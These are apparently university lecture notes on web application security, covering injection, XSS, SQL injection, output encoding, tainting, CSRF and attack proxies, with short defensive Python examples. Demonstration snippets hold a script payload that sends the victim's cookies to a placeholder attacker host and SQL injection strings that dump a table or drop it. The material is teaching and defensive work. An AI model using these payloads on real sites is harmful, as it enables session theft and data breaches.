Part 1: Bugs are functionality, too
- Let’s take a very abstract view of a system, or a component within a system:
All intended functionality brings in unintended functionality
- The ”intended functionality” in the picture is what the software is supposed to do, feature-wise. This intended functionality takes in intended inputs, and produces an intended effect.
- Because of design flaws, implementation bugs, and side effects that result from unintended interactions with the environment, almost all (probably all) non-trivial real-world systems exhibit ”unintended functionality”.
- Bugs are functionality too. Another way of looking at this is that hacking systems doesn’t ”break” them – it just uses them in ways that were unintended by their original authors.
- Viewing the system from this perspective, there are several things you can do. These are discussed in more detail in Part 3, below:
- Removing unnecessary functionality. As unintended functionality is created as a side effect of intended functionality, removing intended functionality also removes some unintended functionality. You cannot tell exactly how much, or which, unintended functionality is removed; but the general consensus is that removing features usually makes the system more resilient. A smaller system is also easier to analyse.
- Restricting the input languages. Language-theoretic security ”posits that the only path to trustworthy software […] is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.”
- The ”feasibility” is about restricting the expressiveness of the language. If your input does not need to be a computer program, why should it be expressed in a Turing-complete language? (Grammars can be ordered in the Chomsky hierarchy.)
- One real-world option is to split the parsing of an expressive language into a (sandboxed) front-end that is as small as possible and restricted in what it can do, and that produces a simplified, less expressive output, which then becomes the input for the main processing step.
A “front-end” with a small codebase creates sanitised input
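The front-end split can be sketched as follows. This is a minimal, hypothetical example: the front-end parses a rich, untrusted `key=value` input and emits only a restricted JSON object of identifiers mapped to integers, which is all the main stage ever sees (the function names and the input format are illustrative, not from any real system).

```python
import json

def front_end(raw: str) -> str:
    """Parse untrusted input; emit only a restricted, simplified form."""
    result = {}
    for field in raw.split(","):
        key, sep, value = field.partition("=")
        key = key.strip()
        # Reject anything outside the restricted language immediately.
        if sep != "=" or not key.isidentifier() or not value.strip().isdigit():
            raise ValueError(f"invalid field: {field!r}")
        result[key] = int(value)
    return json.dumps(result)

def main_stage(simplified: str) -> dict:
    # The main processing step only ever sees the sanitised representation.
    return json.loads(simplified)

print(main_stage(front_end("width=640, height=480")))  # {'width': 640, 'height': 480}
```

In a real deployment the front-end would additionally run in a sandbox, so that a parsing bug in it cannot compromise the main stage.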
- Dropping invalid input. If the inputs are not treated as a formal language with an acceptor (recognizer), as is the typical real-world case where parsers are just hacked together, then invalid inputs often end up being processed. The often-quoted engineering practice of ”being liberal in what you accept, and conservative in what you send” may cause security issues because liberal acceptance often means that we have to interpret badly defined inputs. Security-wise, it is usually better to be conservative. Dropping invalid input as early as possible is usually a good strategy.
- Tainting. In real-world systems, we often process data flows whose origin is unknown, untrusted, or obscure. A strategy that can be pursued both in secure coding and by various tools is ”tainting” these untrusted data flows, and only using them after they have been ”untainted”. This strategy will be discussed later in more detail.
- The concept of tainting is also used in human systems; for example, when a criminal investigation (in the U.S. at least) needs to look at documents that may be under an attorney-client privilege, a separate “taint team” looks at them first, and the investigators only look at the untainted documents.
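A minimal sketch of the tainting idea, assuming a hypothetical `Tainted` wrapper type (the names `Tainted`, `untaint_for_html`, and `html_sink` are illustrative, not from any real framework): untrusted data is wrapped on entry, and the sensitive output sink refuses it until it has been untainted by an explicit encoding step.

```python
import html

class Tainted:
    """Wrapper marking a string as untrusted."""
    def __init__(self, value: str):
        self.value = value

def untaint_for_html(data: Tainted) -> str:
    # Untainting = applying the encoding required by the output context.
    return html.escape(data.value)

def html_sink(data) -> str:
    # The sink enforces that tainted data never reaches the output.
    if isinstance(data, Tainted):
        raise TypeError("refusing to output tainted data")
    return data

user_input = Tainted("<script>alert(1)</script>")
print(html_sink(untaint_for_html(user_input)))  # &lt;script&gt;alert(1)&lt;/script&gt;
```

Real frameworks enforce this more systematically (e.g., via the type system or runtime flags), but the principle is the same: the type of the data encodes its trust status.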
- Context-specific output encoding. Systems output data to other systems. Depending on where the data is being output, it may need to be escaped or encoded. The only place where we really know the required encoding is at the output – we cannot guess where the data ends up later during its lifetime. Doing this elsewhere may lead to double-encoding or missing encoding (the latter of which can be a security issue).
Different output contexts require different encoding
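To illustrate with Python's standard library: the same untrusted string needs different encodings depending on whether it ends up in an HTML body or in a URL query parameter, which is why the encoding can only be chosen at the output.

```python
import html
import urllib.parse

payload = '"><script>alert(1)</script>'

# HTML body context: special characters become entity references.
print(html.escape(payload))
# &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;

# URL query parameter context: percent-encoding instead.
print(urllib.parse.quote(payload, safe=""))
```

Applying the HTML encoding to data destined for a URL (or vice versa) would produce either a broken value or an exploitable gap, which is the double-encoding/missing-encoding problem mentioned above.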
Part 2: Privilege elevation on the web
- Recap of session 1: Data is being run as code in the process context. In the demo and exercises last week, we were working in an environment where the lowest-level execution environment - the processor itself - is tricked into executing attacker’s code.
- The same idea can be pulled off in higher-level languages. In these situations, it is typically an interpreter that is tricked into executing code that has been INJECTED into the original program. The details vary by language and environment.
- Since the advent of the World Wide Web, so-called ”web applications” have become an extremely widely deployed set of programs. Originally, most of the logic was on the server end, and static web pages written in HTML were passed back and forth.
Discussion: Which execution environments or languages exist in the web application space? Where are they executed? Where does the code that they execute come from?
- SQL is also a real programming language in its own right.
- Some ways of getting attacker’s code to run in a web application context. We will look at two: Cross-Site Scripting and SQL injection as examples.
- Cross-Site Scripting (XSS)
- Browsers’ security model is the Same-Origin Policy. The “origin” is a triplet of the URI scheme, domain, and port.
- Scripts from a specific origin can only access and manipulate data from, and connect to, resources of the same origin.
- An XSS attack means that the attacker can inject code into a document which the browser thinks came from that specific origin, and thus can get access to something the attacker shouldn’t be able to access.
Simple reflected XSS
- In this regard, this is a PRIVILEGE ESCALATION attack, where privileges are given by the script origin. (Some might think this kind of shoehorns the attack into this class of issues, but I don’t think it’s that far fetched.)
- XSS attacks come in two major flavours:
- A reflected XSS attack sends the attack code in a request, and gets it back in a response. Because the code now “came” from the specific origin, it has elevated its privileges to act as if it really was intended to come from the server.
- A stored XSS attack is like a reflected attack, but the attack code gets somehow stored in a database or some other place, and it gets played back without it being in the currently processed request.
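A reflected XSS can be sketched in a few lines. This is a hypothetical handler (the function names and the cookie-stealing payload are illustrative): a search page echoes the query parameter back into the HTML response, once without and once with context-specific encoding.

```python
import html

def vulnerable_page(query: str) -> str:
    # UNSAFE: attacker input is reflected into the HTML as-is.
    return f"<p>Results for: {query}</p>"

def fixed_page(query: str) -> str:
    # Encoded for the HTML body context; the payload renders as text.
    return f"<p>Results for: {html.escape(query)}</p>"

attack = '<script>location="http://evil.example/?c="+document.cookie</script>'
print(vulnerable_page(attack))  # script runs in the victim's origin
print(fixed_page(attack))       # rendered as harmless text
```

In the vulnerable version, the injected script executes with the privileges of the page's origin, which is exactly the privilege escalation described above.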
- What can an attacker typically do with an XSS attack?
- Manipulate the web page, and access anything the user types on the web page.
- Steal cookies.
- There are newer web technologies such as Cross-Document Messaging and Cross-Origin Resource Sharing (CORS), which have an effect on the same-origin policy, and the Content Security Policy, which can be used for effective mitigation of XSS. We will not go into these in detail, but be aware that if you want to stay relevant in modern web application security, you need to read up on them.
Discuss: What aspects of the system model of Part 1 contribute to the existence of the XSS problem?
- SQL injection
- SQL is still the most prevalent back-end database query language. The rise of so-called NoSQL databases has eroded its popularity somewhat. However, similar injection ideas also work against many NoSQL databases; Cassandra’s CQL even looks like SQL.
- A very typical SQL injection happens when attacker-supplied query terms are concatenated directly into an SQL query. They get executed as part of the SQL query under the database user’s (i.e., the application’s) privileges, so this, too, can be construed as a privilege escalation.
- What can an attacker typically do with an SQL injection:
- Add, copy, or delete data.
- Dump contents (many of the ’data breaches’ reported in the press have an SQL injection at their core).
- Create new database users, if the permissions allow it.
- If the SQL server (and the user under which the injected code is executed) provides more esoteric services, such as access to the underlying OS environment, those might be used as well.
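The concatenation problem can be demonstrated with Python's built-in sqlite3 module (the table and function names are illustrative): the classic `' OR '1'='1` payload turns the WHERE clause into a tautology and dumps every row instead of one.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")
conn.execute("INSERT INTO users VALUES ('bob', 'swordfish')")

def find_user_vulnerable(name: str):
    # UNSAFE: attacker input is concatenated into the query text itself.
    return conn.execute(
        "SELECT name FROM users WHERE name = '" + name + "'").fetchall()

print(find_user_vulnerable("alice"))        # [('alice',)]
print(find_user_vulnerable("' OR '1'='1"))  # [('alice',), ('bob',)]
```

The attacker-controlled string changed the structure of the query, not just a value in it – which is precisely what prepared statements (Part 3) prevent.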
Discuss: What aspects of the system model of Part 1 contribute to the existence of SQL injections?
Part 3: Output encoding and tainting as defensive principles
- There are various strategies in which these injection attacks can be mitigated:
- Input validation and whitelisting - strip attack code when received;
- Prepared statements and parameterised queries for SQL, where there is a static SQL template, which is populated by attacker-controlled query parameters (but because the template is static, they cannot affect the statement);
- Output encoding.
- Input validation is very hard to do right. Examples where it goes wrong:
- Encodings that the filter author forgets;
- incomplete or bad regular expressions that do not catch everything;
- if your valid input is essentially code, you would have to figure out what the code does;
- broken libraries you depend on for (un)serialising / (un)marshalling;
- false positives and overly strict filters – the O’Donnells and Vähä-Sipiläs of the world always have fun;
- and of course, input languages that cannot be validated because they’re too expressive, so you can’t write a proper parser (recogniser).
- What would be the (academically speaking) correct way to do input validation?
- A state machine that is driven by specific inputs, with clearly defined state transitions caused by each symbol that is read.
- This requires a formal grammar specification for the input. The challenge is that many real-life inputs are not easy to parse. For example, validating input where validation depends on something that was in the input previously (context-sensitive) potentially causes pretty hard validation challenges. Also most real-life specifications are not formal enough to be without interpretation issues.
- Prepared statements are query-language specific, and often database specific.
Example: INSERT INTO foo VALUES (?, ?, ?), where $quux, $bar, and $bletch are bound to the ? placeholders
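In Python's sqlite3 module, a parameterised query might look like the following sketch (the table and column names are illustrative). The statement text is static; the attacker-controlled values are bound to the placeholders and can never change the structure of the query.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE foo (quux TEXT, bar TEXT, bletch TEXT)")

# Even a classic injection payload is stored as an inert string value.
values = ("a'; DROP TABLE foo; --", "b", "c")
conn.execute("INSERT INTO foo (quux, bar, bletch) VALUES (?, ?, ?)", values)

print(conn.execute("SELECT quux FROM foo").fetchall())
# [("a'; DROP TABLE foo; --",)]
```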
- Output encoding in practice:
- The idea is that attacker injection only works if the injected data is interpreted as code (i.e., directing execution) in the output context.
- Usually every output context has escaping rules where characters that would otherwise have special meaning will be transformed into something that only represents the character.
- Input validation does not replace the need to do proper output encoding.
- When doing input validation, you do not yet know in which contexts the data is going to be output in the future.
- In output encoding, the developer knows exactly where the untrusted data is (immediately) being used, so specific escaping or encoding can be applied.
- There is less probability for data corruption due to poorly implemented, pre-emptive escaping or filtering.
- Against what sort of attacks does output encoding not help?
- Those cases where the attacker wants to control the validation logic itself. Bad data could cause something to be evaluated incorrectly, thus passing a validity check. (E.g., bypass digital signature check through malformed input - particularly pressing issue when the input is complex and open to interpretation.)
- Input TAINTING is a method that can be used to track untrusted input through the system.
- Untrusted (i.e., potential attacker) input is marked as ”tainted”, and the system ensures that tainted data cannot be output in any sensitive output context before being untainted (i.e., escaped or encoded).
- Some frameworks offer good support for this, e.g., Django (a Python web framework). Perl even has a taint option for running programs.
- To summarise, some design and implementation paradigms for inputs:
- Aim for inputs that are as simple as possible, and implement parsers for them using a parser generator (look at Bison and Yacc).
- Perform complex parsing in a restricted environment, like a sandbox, if you can.
- Avoid too expressive languages to convey data, if simple ones suffice. (Example: If all you need to provide can be expressed in a CSV, why use an Excel sheet?)
- Never try to guess what the input meant. Strict input validation and silent discard are often good alternatives, although compatibility issues may be in conflict with this principle.
- Always understand the output context and perform output encoding when you know the output context. Do not perform encoding/escaping until you know the output context, to avoid double encoding.
Part 4: Web session attacks
- There’s a large category of problems that are related to confused state machines that plague web applications.
- HTTP itself is stateless, but web applications are stateful.
- In order to tie separate web page requests together, the server must have some information about the client. Usually this is done through creating a session, identified by a session identifier, and the client provides this session identifier to the server in every request.
- This is often implemented as a session cookie, which, as we remember, is sent automatically every time a request is made to that domain.
- This opens up various ways of attacking the user’s session.
- Cross-Site Request Forgery (CSRF, pronounced ”cee-surf”)
- Another web site directs the browser to the target site;
- The browser happens to be ”in session” (e.g., logged in) to the target site;
- The target site believes that this was an authentic user-initiated request and processes it.
- Mitigating these risks is a pain if you need to do it manually. Modern, good web frameworks provide protection against this type of issue (as well as good session control) out of the box.
- Therefore, it is important to keep these issues in mind when doing technology selection for web application development.
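The common framework-level CSRF defence is a per-session token. A hypothetical sketch (function names and the form layout are illustrative): the server embeds a random token in its own forms and rejects state-changing requests that do not echo it back; a cross-site attacker cannot read the token because of the same-origin policy.

```python
import hmac
import secrets

# One random token per session, stored server-side.
session_token = secrets.token_hex(16)

def render_form() -> str:
    # The server's own pages include the token as a hidden field.
    return f'<input type="hidden" name="csrf_token" value="{session_token}">'

def handle_post(form: dict) -> bool:
    # Constant-time comparison; reject requests without a matching token.
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied, session_token)

print(handle_post({"csrf_token": session_token}))  # True: genuine form post
print(handle_post({}))                             # False: forged request
```

Frameworks such as Django implement essentially this pattern for you, which is one reason technology selection matters.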
Part 5: Web security testing with attack proxies
Note: The weekly exercise involves the use of attack proxies. We will do a high-level introduction to them during the lecture to get you up to speed.
- Typical exploratory web security testing utilises an attack proxy (a man-in-the-middle proxy).
- An attack proxy sits between the client and the server, and allows the tester to modify server requests and responses.
- OWASP has a tool called Zaproxy (Zed Attack Proxy); there is a commercial tool with a lot of market share called the Burp Suite Professional.
Demo: We show both Burp Suite and Zap in practice – what they look like, and what concepts you need to understand about them.
This is a list of useful documents that will enhance your understanding of the course material. The reading list is session-by-session. “Primary” material means something you would be expected to read if you are serious about the course, and may help you to do the weekly exercise; “Additional” material you may want to read if you would like to deepen your understanding on a specific area.
- The sqlmap SQL injection discovery tool is a powerful thing. Have a look at its feature list.
- Have a look at Django security documentation. Of special note, read the section on XSS and think about how the “safe strings” concept relates to tainted data and output encoding. Also read the section on CSRF and try to comprehend how the CSRF protection works in Django. It doesn’t matter if you don’t have previous Python or Django exposure; the overall idea should be clear.
- Programs with exploitable bugs can be viewed as weird machines that are programmed with exploits; for example, a ROP attack could be seen as a language that specifies an execution flow for a machine that is the vulnerable program. If you’re interested, see Bratus et al.: Exploit Programming: From Buffer Overflows to “Weird Machines” and Theory of Computation and Bratus, et al.: Beyond Planted Bugs in “Trusting Trust”: The Input-Processing Frontier in IEEE Security & Privacy, January 2014.
- For the course targets, the weekly exercise will give you exposure to the attack proxies. The Burp Suite documentation is fairly good, so I recommend reading http://portswigger.net/burp/help/suite_usingburp.html#vulns to get a feel for how a web application security assessment would run (even if you choose to use Zaproxy for the weekly exercise).
- If you are truly interested in delving deeper in specifically web application security:
- Stuttard and Pinto: The Web Application Hacker’s Handbook, 2nd Edition. This is a thick one, and definitely not needed for the course. But if you want to go forward in web application security testing, this one methodically gives you a (long!) checklist of things you need to explore. Written by the author of the Burp Suite, it goes well with that specific tool. Unlike many “hacking” books out there, the book approaches web security testing as a methodical and sometimes boring exercise (which is what it is). It is getting a bit dated, so it doesn’t cover the newest web technologies. I hope the authors will update the book at some point.
- Zalewski: The Tangled Web. This book is a seemingly never-ending list of design and implementation failures in web browsers and technologies. It makes for entertaining reading if you have any background in web application implementation or standardisation, and opens your eyes to all the crud that exists in this space. This book is also getting a bit dated – though that does not diminish its humour value. By the way, the author of this book is also the author of the AFL fuzzer, which we used in the previous assignment.
This is lecture support material for the course on Software Security held at Aalto University, Spring 2018. It is not intended as standalone study material.